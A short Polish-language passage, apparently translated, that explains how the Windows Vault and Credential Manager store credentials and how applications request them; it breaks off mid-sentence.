Skarbiec systemu Windows przechowuje poświadczenia, które system Windows może automatycznie zalogować użytkowników, co oznacza, że każda aplikacja systemu Windows, która potrzebuje poświadczeń do uzyskania dostępu do zasobu (serwera lub strony internetowej) może skorzystać z tego Menedżera poświadczeń i Skarbca systemu Windows oraz użyć dostarczonych poświadczeń zamiast tego, aby użytkownicy wprowadzali nazwę użytkownika i hasło za każdym razem.

Chyba że aplikacje współpracują z Menedżerem poświadczeń, nie sądzę, aby mogły one używać poświadczeń dla danego zasobu. Dlatego jeśli twoja aplikacja chce skorzystać ze skarbca, powinna w jakiś sposób komunikować się z menedżerem poświadczeń i żądać poświadcz